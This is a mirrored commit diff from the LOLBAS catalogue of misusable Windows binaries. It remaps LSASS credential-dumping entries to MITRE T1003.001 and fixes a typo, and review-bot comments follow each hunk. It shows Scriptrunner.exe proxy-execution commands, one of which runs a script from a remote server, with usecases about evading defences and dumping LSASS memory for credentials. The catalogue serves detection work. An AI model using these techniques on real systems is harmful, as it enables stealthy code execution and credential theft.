mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
LSASS realign to T1003.001
This commit is contained in:
parent
df8c88f4ca
commit
2380c506d4
@ -6,14 +6,14 @@ Created: 2018-05-25
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||||
Description: Executes calc.exe
|
Description: Executes calc.exe
|
||||||
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1202
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||||
Description: Executes calc.cmd from remote server
|
Description: Executes calc.cmd from remote server
|
||||||
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
|
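Review bot: This hunk is unrelated to the commit title ("LSASS realign to T1003.001"): it only corrects the spelling "measurments" to "measures" in the two Usecase lines of the Scriptrunner.exe entry. Either split it into its own commit or mention the typo fix in the commit message so the history stays searchable. While this file is open, the context lines also show the two commands mapped to different techniques (T1202 for `-appvscript calc.exe`, T1218 for the `\\fileserver\calc.cmd` variant) although both Usecase lines describe the same "execute binary through proxy binary" behaviour; since this commit is about realigning MITRE IDs, it would be worth deciding on one mapping or documenting why they differ.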
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: SYSTEM
|
Privileges: SYSTEM
|
||||||
MitreID: T1003
|
MitreID: T1003.001
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\comsvcs.dll
|
- Path: c:\windows\system32\comsvcs.dll
|
||||||
|
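Review bot: T1003.001 (OS Credential Dumping: LSASS Memory) is the right sub-technique for this entry, since the Usecase line at the top of the hunk explicitly describes dumping Lsass.exe process memory, so the change from the parent T1003 is correct and nothing else in the hunk needs touching. One consistency point visible across the commit: this comsvcs.dll entry records `Privileges: SYSTEM`, while the SQLDumper.exe entry further down records `Administrator` for the same LSASS dump action; if the difference is intentional, a short explanation in the Description would help readers who use the Privileges field for detection triage.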
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Create memory dump and parse it offline
|
Usecase: Create memory dump and parse it offline
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: SYSTEM
|
Privileges: SYSTEM
|
||||||
MitreID: T1003
|
MitreID: T1003.001
|
||||||
OperatingSystem: All Windows
|
OperatingSystem: All Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||||
|
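Review bot: The Usecase on the first line of this hunk ("Create memory dump and parse it offline") does not mention LSASS, so the narrowed MitreID T1003.001 is not justified by the entry's own text; suggest updating the Usecase to name the lsass.exe target (for example "Create memory dump of lsass.exe and parse it offline") so the sub-technique mapping is self-explanatory. Also, this entry uses `OperatingSystem: All Windows` whereas the comsvcs.dll and SQLDumper.exe entries in the same commit use `Windows`; normalising the value while these files are being edited would keep the field consistent.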
@ -16,7 +16,7 @@ Commands:
|
|||||||
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
|
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1003
|
MitreID: T1003.001
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||||
|
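Review bot: The change to T1003.001 is consistent with the Usecase line at the top of this hunk ("Dump LSASS.exe to Mimikatz compatible dump using PID"), so the realignment is correct here. The hunk header shows this entry's Commands block starts at line 16, later than the other two (line 9), so please double-check that the file does not contain a second Command with its own MitreID line that also needs moving from T1003 to T1003.001; a `grep -n "MitreID: T1003$"` over the yml directory before merging would confirm no parent-only IDs remain for LSASS-dump entries.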